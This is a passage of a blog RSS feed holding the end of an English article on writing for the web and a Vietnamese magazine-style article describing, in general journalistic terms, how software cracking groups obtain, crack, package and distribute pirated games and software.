USE LESSER LINKS</p>
<p>Some online articles are full of links. Even for a two-line explanation, some writers use a second page and give the hyper link in the first page. I find it very restrictive, especially if I want to take a printout for later reading. Agreed, sometimes we can’t help it, but keep in mind that where you can avoid giving a link, avoid it.</p>
<p>Another problem with links is, they distract the reader. Sometimes the reader goes to the link, reads whatever is there, and ends up forgetting the original page.<br />
HIGHLIGHT MAIN POINTS IN THE BEGINNING</p>
<p>Yes, this is a very important point. If you give the headlines at the beginning of the page, and if you make them interesting, the web readers tend to read with greater earnestness.</p>
<p>Suppose an article or a section tells the insomniacs how they can sleep using the technique mentioned in the article or the section. The following highlight would probably trigger an interest:</p>
<p>DO YOU CRAVE TO SLEEP CONTINUOUSLY FOR AT LEAST 10 HOURS WITHOUT TAKING A PILL? READ ON TO KNOW HOW YOU CAN.<br />
MAKE COMPLETE PAGES</p>
<p>As far as possible, all relevant pages should be self-reliant, and should be present in their intrinsic entirety. Web surfers arrive at web pages randomly, sometimes directly from a search engine or a referred link. There is no way to tell where they’ve been or where they’ll go after visiting your page. Even if you try to provide content using links to bind related pages together, you cannot force a Web reader to follow those links. As a result, your approach must be encyclopedic, giving the reader a fairly comprehensive presentation of the topic on every page. Whenever they arrive, they should know where they are without having to go here and there.</p>
<p>Always include a link that takes to the main section of the web site with just one click.<br />
IMPORTANT THINGS FIRST</p>
<p>The important message that is to be communicated to your visitor, according to the relevance, should come first on the page, and if aesthetically possible, properly highlighted. Think of all those things that the visitor should/would like to see first most, and keep them as easily accessible as possible.</p>
<p>You should present the important information in the first two or three paragraphs so that by the time the reader gets distracted and leaves the site, you have conveyed your main message.<br />
MAKE PRINTABLE PAGES</p>
<p>If you have lots of textual content on your web site, keep it in a form so that your readers can take out printouts. Either create separate copies of your web pages stripped off all the layout features, or use a ready-made script (you can get many such scripts on the Internet) that removes all the HTML tags before showing your web page.</p>
<p>This sums-up my writing presentation for the time being. If you feel I have left out some vital point, you are welcome to let me know.</p>
<p>Copyright © 2010 Amrit Hallan<br />
If you want to publish this article, please let me know.</p>
<p>http://amrithallan.com/how-to-write-for-the-web/</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ttdoanst.wordpress.com/41/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ttdoanst.wordpress.com/41/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ttdoanst.wordpress.com/41/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ttdoanst.wordpress.com/41/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/ttdoanst.wordpress.com/41/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/ttdoanst.wordpress.com/41/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/ttdoanst.wordpress.com/41/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/ttdoanst.wordpress.com/41/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ttdoanst.wordpress.com/41/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ttdoanst.wordpress.com/41/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ttdoanst.wordpress.com/41/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ttdoanst.wordpress.com/41/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ttdoanst.wordpress.com/41/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ttdoanst.wordpress.com/41/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ttdoanst.wordpress.com&amp;blog=913261&amp;post=41&amp;subd=ttdoanst&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://ttdoanst.wordpress.com/2010/11/26/how-to-write-for-the-web/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/f3ddbd23fa77f8f6aead16aa8532dc7f?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">ttdoanst</media:title>
		</media:content>
	</item>
		<item>
		<title>Mã bảo vệ phần mềm</title>
		<link>http://ttdoanst.wordpress.com/2007/08/13/ma-b%e1%ba%a3o-v%e1%bb%87-ph%e1%ba%a7n-m%e1%bb%81m/</link>
		<comments>http://ttdoanst.wordpress.com/2007/08/13/ma-b%e1%ba%a3o-v%e1%bb%87-ph%e1%ba%a7n-m%e1%bb%81m/#comments</comments>
		<pubDate>Mon, 13 Aug 2007 17:11:38 +0000</pubDate>
		<dc:creator>ttdoanst</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://ttdoanst.wordpress.com/2007/08/13/ma-b%e1%ba%a3o-v%e1%bb%87-ph%e1%ba%a7n-m%e1%bb%81m/</guid>
		<description><![CDATA[Ngày 15/9/2002, cả dân gamer trên Net lẫn hãng sản xuất đều sửng sốt khi thấy toàn bộ game Unreal Tournament 2003 được đưa lên mạng cho tải về miễn phí, trong khi các cửa hàng chưa hề bày bán game này, còn lịch phát hành chính thức phải là mười ngày sau đó! Khi [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ttdoanst.wordpress.com&amp;blog=913261&amp;post=28&amp;subd=ttdoanst&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><font size="2">Ngày 15/9/2002, cả dân gamer trên Net lẫn hãng sản xuất đều  sửng sốt khi thấy toàn bộ game Unreal Tournament 2003 được đưa lên mạng cho tải  về miễn phí, trong khi các cửa hàng chưa hề bày bán game này, còn lịch phát hành  chính thức phải là mười ngày sau đó! Khi lên mạng, game này đã bị &#8220;phanh thây&#8221;  thành 65 file dung lượng 15MB, kèm theo một trình&#8230; phá mã bảo vệ để có thể  chạy ngon lành vô thời hạn. Những cracker &#8211; chuyên gia bẻ khóa phần mềm &#8211; đã ra  tay!</p>
<p>Ở đâu có phần mềm, ở đó có cracker<br />
Kể từ đầu thập niên 1980, khi nhiều bạn đọc e-CHÍP còn chưa tốt nghiệp&#8230; mẫu  giáo thì các phần mềm đã bị sao chép tùm lum. Điều đó buộc các nhà sản xuất phần  mềm phải cài vào trong sản phẩm của mình một phương cách bảo vệ nào đó để chống  lại việc chia sẻ phần mềm bất hợp pháp. Thế là ra đời kỹ thuật install-counter  và số serial number. Bạn đọc e-CHÍP hẳn không còn ai xa lạ với khái niệm serial  number &#8211; một dạng chìa khóa điện tử mà không có nó thì không thể cài đặt phần  mềm vào máy tính. Còn kỹ thuật install-counter (đếm số lần cài đặt) sẽ theo dõi  xem phần mềm sẽ được cài đặt bao nhiêu lần vào máy tính và khống chế số lần gỡ  bỏ, cài đặt lại. Thời đó chưa có internet nên các chuyên gia không hề nghĩ đến  việc phần mềm sẽ được phân phát nhanh chóng khắp thế giới như ngày nay. Tuy vậy,  ngay khi phần mềm bắt đầu có khóa bảo vệ thì các cracker xuất hiện, tò mò thử  xem những ổ khóa ấy&#8230; kiên cố đến đâu.</p>
<p>Các cracker thời đó chỉ làm một việc rất đơn giản: Tìm đường vòng để tránh né  khóa bảo vệ. Họ sao chép lại bộ đĩa mềm gốc ngay trước khi cài đặt lần đầu tiên,  hoặc chép lại các file đã cài đặt từ trong máy tính. Những trò táy máy này buộc  các nhà sản xuất phần mềm phải bóp óc nghĩ ra những chiêu thức bảo vệ cao siêu  hơn. Kết quả là họ đã góp phần thúc đẩy cho sự hình thành và phát triển của  những&#8230; nhóm cracker có trình độ cao hơn (đơn giản chỉ là vỏ quýt dầy thì móng  tay nhọn!). Trong khi các cracker mừng rỡ hoan hô sự ra đời của internet để họ  có thể chia sẻ những kỹ thuật và phân phát thành tích bẻ khóa của họ cho nhiều  người hơn thì các hãng sản xuất phần mềm vỗ tay chào mừng đĩa CD vì cho rằng có  thể dùng CD để phát hành phần mềm chứ không dùng đĩa mềm nữa. Với sức chứa rất  lớn của CD và đường truyền internet rất chậm thuở ấy, các hãng phần mềm tha hồ  sản xuất những phần mềm có dung lượng cực lớn (vài trăm Mb so với vài Mb trước  đó), hy vọng rằng chính bản thân dung lượng lớn của phần mềm sẽ làm bó tay những  cracker giỏi nhất. Nhưng không, thế giới ngầm cracker lại phát triển những kỹ  thuật&#8230; bẻ khoá để đáp trả. Một trong những kỹ thuật chứng tỏ bản lãnh cracker  là có thể nén nhỏ một phần mềm 600Mb chỉ còn&#8230; 50Mb mà thôi.</p>
<p>Hiện nay, việc bẻ khóa phần mềm đã nâng lên một tầm cao kỹ thuật mới và dường  như không hề có điểm dừng. Cùng với sự ra đời đường kết nối internet cao tốc và  những chương trình nối ngang hàng các máy tính trong hệ thống mạng, các kỹ thuật  chống bẻ khóa mới cũng ra đời. Chẳng hạn, buộc người dùng phần mềm phải đăng ký  với nhà sản xuất qua điện thoại &#8211; Microsoft đã dùng kỹ thuật này cho Windows XP.  Nhưng phần mềm vẫn cứ bị&#8230; crack!</p>
<p>Nguồn phần mềm từ đâu ra?<br />
&#8220;PRADiGM đang nỗ lực để giữ vững đẳng cấp của mình. Hãy liên lạc với chúng tôi  ngay nếu như bạn có thể cung cấp những tựa game mới chưa phát hành.&#8221; Đó là một  phần nội dung của file văn bản kèm theo một game đã bị bẻ khóa. Nhóm cracker  PRADiGM “chuyên trị” những game sử dụng những tập tin nfo (viết tắt của  &#8220;information&#8221;) đi kèm theo những tựa game đã crack của họ để huy động người ủng  hộ. Các nhóm cracker khác cũng thường dùng những file nfo như thế. Điều đó cho  thấy giá trị của những tựa game hay sản phẩm phần mềm chưa chính thức phát hành  có giá trị như thế nào trong cộng đồng cracker. Nếu một nhóm nào đó có thể bẻ  khóa và tung lên mạng một phần mềm chưa phát hành, nhóm này đã chứng tỏ mình&#8230;  &#8220;trên cơ&#8221; những nhóm khác. Nhưng muốn có được nguồn phần mềm này, các nhóm  cracker phải có những quan hệ đúng người đúng chỗ. Một kẻ &#8220;nằm vùng&#8221; trong Phòng  Phát triển phần mềm hay ở nhà máy dập CD có thể dễ dàng chuyển sản phẩm đến các  nhóm cracker mà ít gặp nguy hiểm. Đổi lại, “tên nằm vùng” này sẽ được tiếp cận  một nguồn cung cấp phần mềm miễn phí vô tận bởi những “tên nằm vùng” khác &#8211; tất  cả đều là đồ xài chùa, và chạy ngon lành (với một cách bẻ khóa thích hợp).</p>
<p>Tuy nhiên, nếu phần mềm phát hành chính thức không nổi tiếng, hoặc không có  người nằm vùng để chuyển hàng thì cách lấy được phần mềm gốc rõ ràng là từ một  nhân viên bất hảo nào đó đang làm việc trong một cửa hàng bán phần mềm. Tất cả  chỉ cần một đêm với một đĩa CD là một phần mềm có thể được sao chép và đẩy lên  mạng tới một nhóm cracker đang háo hức trông chờ. Mặc dù phần mềm lấy từ nguồn  này không &#8220;có giá&#8221; bằng phần mềm chưa phát hành nhưng nếu một nhóm cracker có  thể lấy được phần mềm gốc trước các nhóm khác thì vẫn giành được sự kính nể của  các bạn “đồng đạo&#8230; chích”. Nhưng nhóm cracker &#8220;trên cơ&#8221; này phải có sẵn một  “cao thủ” để nhanh chóng phá tung tất cả ổ khóa đã được cài trong chiếc CD sản  phẩm gốc vừa nhận được.</p>
<p>Tài nghệ cracker<br />
Crack chính là tiến trình debug (gỡ lỗi) cho phần mềm nhưng thay vì gỡ lỗi, các  cracker lại nhắm vào những điểm then chốt trong phần mềm có tính năng bảo vệ sản  phẩm chống lại việc sao chép. Bằng việc sử dụng các chương trình công cụ crack  để dò tìm một cách hệ thống trong sản phẩm gốc, một cracker giỏi có thể bẻ khoá  một phần mềm trong vòng vài giờ. Cách bẻ khoá kiểu debug này phổ biến đến nỗi  MỌI phần mềm thương mại ra bán trực tiếp hay qua mạng đều có một cách crack  tương ứng phá bỏ mọi ổ khoá bảo vệ.</p>
<p>Nhìn chung, các phần mềm đã bị bẻ khoá thường được phân phối kèm theo hai chương  trình nhỏ do các cracker viết. Chương trình thứ nhất là một key gerenator chuyên  tạo ra những dãy số serial number ngẫu nhiên phù hợp với những đòi hỏi bản quyền  của sản phẩm gốc. Chương trình thứ hai thường là một patch (miếng vá) nhằm thay  thế một số file điều khiển của sản phẩm gốc bằng những file tương ứng đã debug  để phần mềm có thể chạy trơn tru mà không cần có CD gốc.</p>
<p>Đương nhiên các hãng sản xuất phần mềm thừa biết những kiểu bẻ khoá này và không  ngừng tìm kiếm nhiều phương kế để không cho cracker chọc thủng tường rào bảo vệ  sản phẩm của mình. Để đáp trả, các nhóm cracker luôn cần những thành viên tài ba,  sẵn sàng tìm ra mọi kẻ hở của sản phẩm gốc để qua mặt cả những kỹ thuật bảo vệ  tân kỳ nhất. Những cracker này thường rất giỏi về ngôn ngữ Assembler. Giống như  nhóm cracker PRADiGM hô hào mọi người cung cấp game mới cho họ bẻ khoá, các nhóm  cracker khác cũng kêu gọi các cracker tài ba tham gia nhóm của họ. Chẳng hạn,  xin trích lời “hiệu triệu” của nhóm cracker ORIGIN: &#8220;Chúng tôi hiện đang tìm  kiếm nhiều cracker đã có tay nghề và những người đào tạo cracker để chiêu mộ làm  thành viên. Nếu bạn biết cách bẻ khoá Safedisc/C-Dilla hay SecuROM hay VOB, hãy  liên lạc với chúng tôi NGAY LẬP TỨC!&#8221;.</p>
<p>Safedisc/C-Dilla, SecuROM, và VOB đều là những phương pháp chống sao chép CD mà  các hãng phần mềm hiện nay thường dùng để bảo vệ bản quyền của mình. Nếu ta sao  chép lại từ CD gốc có cài các kỹ thuật bảo vệ này thì máy tính sẽ nhận biết đó  là bản sao bất hợp lệ và sẽ không chạy chương trình. Nhưng cracker vẫn có cách  bẻ khóa được như thường. Quả là cuộc đối đầu bất phân thắng bại!</p>
<p>Đóng gói sản phẩm crack<br />
Khi một chương trình đã được crack xong thì đến lúc phải &#8220;đóng gói&#8221; ngay. Mặc dù  một số ít người dùng internet băng thông rộng dễ dàng tải về những tập tin lớn  hơn 600Mb, phần lớn người trên thế giới vẫn phải tải về qua đường điện thoại với  những modem 56K ì ạch. Để hỗ trợ đa số người dùng internet qua modem 56K, những  nhóm cracker &#8220;ưu tú&#8221; nhất đã đặt ra những quy tắc khi phát hành phần mềm đã  crack. Đặc biệt là nhiều nhóm chuyên crack các tựa game có lúc hợp thành một  liên minh và thống nhất những&#8230; “tiêu chuẩn ISO” về số lượng file trong một  game đã crack và đóng gói lại, tổng dung lượng của toàn bộ sản phẩm đóng gói  này, số tính năng còn lại của game sau khi đã bẻ khóa và đóng gói,&#8230; Những  &#8220;tiêu chuẩn ISO&#8221; này sẽ xác định chất lượng của sản phẩm crack và đẳng cấp của  cracker.</p>
<p>Một cracker của nhóm Faction đã mô tả quy trình crack một tựa game 600Mb và đóng  gói thành sản phẩm 200Mb như sau: &#8220;Điều đầu tiên là xác định xem làm cách nào để  lừa được các kỹ thuật bảo vệ bản quyền. Chương trình bẻ khóa thường nhỏ, chẳng  chiếm nhiều dung lượng nhưng phải tính toán luôn để gộp chung vào bản phân phối  miễn phí sau cùng. Kế đó, cả nhóm phải tìm xem thành phần nào có trong chương  trình game có thể vứt bỏ mà không ảnh hưởng đến trò chơi. Đương nhiên những file  cài đặt bổ sung kiểu DirectX là có thể vứt bỏ ngay. Kế đó, tất cả các file âm  thanh, thường là những file WAV rất lớn, sẽ được chuyển đổi thành file MP3 cho  gọn nhẹ và một chương trình chuyển đổi cũng sẽ được thêm vào để đổi ngược file  MP3 này thành file WAV khi người dùng cài vào máy tính. Sau đó, nhóm cracker sẽ  mổ xẻ xem các file phim, âm thanh, ca khúc hay bất kỳ file nào là không cần  thiết trong việc chơi game thì loại bỏ luôn. Các cracker sẽ viết một chương  trình patch ngăn chặn không cho game sử dụng các file đã bị loại này”. Tuy  nhiên, việc loại bỏ file như vậy sẽ ảnh hưởng đến chất lượng sản phẩm crack và  uy tín của nhóm cracker. May là các nhóm cracker có thể khôi phục uy tín của  mình bằng cách tung ra một sản phẩm đóng gói khác, bao gồm những file multimedia  đã bị loại trước đây để bổ sung vào game. &#8220;Một khi game đã bị “phanh thây” thì  chúng tôi viết một installer (trình cài đặt) và kèm với những file này. Tiến  trình cài đặt hoàn toàn tự động với một cú nhấp chuột đơn giản. Tới đây, công  đoạn cuối cùng là đóng gói cả chương trình thành những phần nhỏ sao cho dễ dàng  phân phối. Tiêu chuẩn bây giờ là mỗi file phân phối không được lớn hơn 15Mb và  tổng số file cũng được khống chế sao cho người dùng có thể dễ dàng tải về và  phát hiện được ngay những file bị thiếu hụt.&#8221;</p>
<p>Cả công việc bẻ khóa game lẫn các sản phẩm phần mềm khác nhìn chung cũng đã được  &#8220;ISO hóa&#8221; thành bốn tiến trình: thu thập, bẻ khóa, đóng gói và phân phối, với  mỗi tiến trình có những biến đổi khác nhau chút ít.</p>
<p>Những con đường phân phối<br />
Trong khi các tiến trình thu thập, bẻ khóa và đóng gói nói trên vẫn xúc tiến  trong bí mật với nhiều &#8220;chiêu thức bí truyền&#8221; ít người biết thì việc phân phối  phần mềm đã crack lại là chuyện phổ biến&#8230; trong nhà ngoài phố. Con đường huyết  mạch để lưu thông và vận chuyển phần mềm bất hợp pháp hiện nay chính là  internet. Nếu bạn thắc mắc tại sao lại có người rỗi hơi thiết lập các website và  đưa lên vô số phần mềm cho mọi người xài chùa thì câu trả lời sẽ có hai điểm cần  lưu ý:</p>
<p>Thứ nhất, internet cung cấp một sân chơi nặc danh tương đối an toàn cho những  người chuyên phân phát phần mềm đã crack.</p>
<p>Thứ hai, sức cám dỗ của việc được sử dụng những phần mềm mới nhất mà không mất  tiền vẫn đầy mê hoặc với ngay cả người dùng ở những nước phương Tây vốn có  truyền thống tôn trọng luật pháp. Khi người dùng internet ào vào các website cho  tải phần mềm “chùa” thì nhiều nhóm phân phối phần mềm bất hợp pháp đã nghĩ ra  trò kiếm tiền bằng cách bắt tay với những website&#8230; khiêu dâm &#8211; mặc dù đối với  hầu hết các cracker &#8220;chân chính&#8221;, việc bẻ khoá phần mềm chỉ là một trò thách  thức trí tuệ vô vụ lợi. Các website phân phối phần mềm bất hợp pháp thường được  bao quanh bằng vô số logo hay banner quảng cáo của các website khiêu dâm. Cứ mỗi  lần có người truy cập vào, một phần mềm sẽ ngấm ngầm kích cho hàng loạt cửa sổ  pop-up xổ đầy màn hình của người truy cập mời chào tham quan các website khiêu  dâm này. Cứ căn cứ theo số lần cửa sổ pop-up được&#8230; sổng chuồng, chủ website  phân phối phần mềm sẽ lấy một khoản tiền tương ứng từ chủ các website khiêu dâm.</p>
<p>Việc truy lùng gốc tích của những phần mềm đã bẻ khoá này rất khó khăn vì các  cracker sử dụng mọi kỹ thuật công nghệ để giữ bí mật xuất xứ hòng tránh bị nhà  chức trách tóm cổ. Trên website thường chỉ có đường dẫn tới phần mềm cho tải về,  còn phần mềm lại nằm trên một máy chủ khác được đặt ở những nước thực thi luật  bản quyền lỏng lẻo. Thậm chí, các cracker còn có thể đột nhập trái phép vào bất  kỳ một máy chủ hợp pháp nào và sử dụng đĩa trống trong máy chủ đó để làm kho  chứa hàng phi pháp của mình. Những máy chủ ở Trung Quốc hiện nay thường được  chọn làm &#8220;kho chứa hàng&#8221; lý tưởng và các cracker Trung Quốc ngày càng được kính  trọng trong thế giới ngầm này.</p>
<p>Bất kể nhiều nước đã đưa tội danh cracker vào bộ luật hình sự của mình, bất kể  nhiều tổ chức cracker đã bị phát hiện và bắt giữ, tình trạng bẻ khóa phần mềm  vẫn không hề suy giảm. Các nhà chức trách lẫn nhà sản xuất phần mềm vẫn luôn đối  mặt với câu hỏi: Có thể chặn đứng nạn cracker được không? Câu trả lời dường như  là KHÔNG!</font></p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/ttdoanst.wordpress.com/28/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/ttdoanst.wordpress.com/28/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ttdoanst.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ttdoanst.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ttdoanst.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ttdoanst.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/ttdoanst.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/ttdoanst.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/ttdoanst.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/ttdoanst.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ttdoanst.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ttdoanst.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ttdoanst.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ttdoanst.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ttdoanst.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ttdoanst.wordpress.com/28/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ttdoanst.wordpress.com&amp;blog=913261&amp;post=28&amp;subd=ttdoanst&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://ttdoanst.wordpress.com/2007/08/13/ma-b%e1%ba%a3o-v%e1%bb%87-ph%e1%ba%a7n-m%e1%bb%81m/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/f3ddbd23fa77f8f6aead16aa8532dc7f?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">ttdoanst</media:title>
		</media:content>
	</item>
	</channel>
</rss>
